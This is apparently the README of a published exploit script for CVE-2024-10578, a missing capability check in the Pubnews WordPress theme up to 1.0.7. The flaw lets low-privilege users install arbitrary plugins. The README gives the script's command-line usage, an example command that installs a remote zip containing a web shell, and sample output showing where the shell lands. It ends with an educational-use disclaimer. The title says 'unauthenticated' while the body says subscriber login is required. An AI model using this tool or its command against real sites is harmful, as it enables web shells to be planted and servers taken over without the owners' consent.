
Pubnews <= 1.0.7 - Instalação Não Autenticada de Plugin Arbitrário
O tema Pubnews para WordPress é vulnerável à instalação não autorizada de plugins arbitrários devido à falta de verificação de capacidade na função pubnews_importer_plugin_action_for_notice() em todas as versões até, e incluindo, 1.0.7. Esta vulnerabilidade permite que atacantes autenticados com acesso de nível de Assinante ou superior instalem plugins arbitrários que podem ser usados para explorar outras vulnerabilidades.
Este script explora a vulnerabilidade no tema Pubnews para instalar um plugin arbitrário a partir de uma URL fornecida. O plugin pode conter um shell malicioso ou qualquer outro payload.
CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL
Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi
options:
-h, --help show this help message and exit
-u, --url URL The URL of the WordPress site
-un, --username USERNAME
The username for WordPress login
-p, --password PASSWORD
The password for WordPress login
-url_zip, --plugin_url PLUGIN_URL
The plugin URL to install (must be a zip file with the shell injected inside)
python
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/
Este script é destinado apenas para fins educacionais. O autor não apoia o uso deste script para atividades ilegais. Use-o com responsabilidade e apenas em sistemas que você tenha permissão explícita para testar.
Por: Nxploited | Khaled Alenazi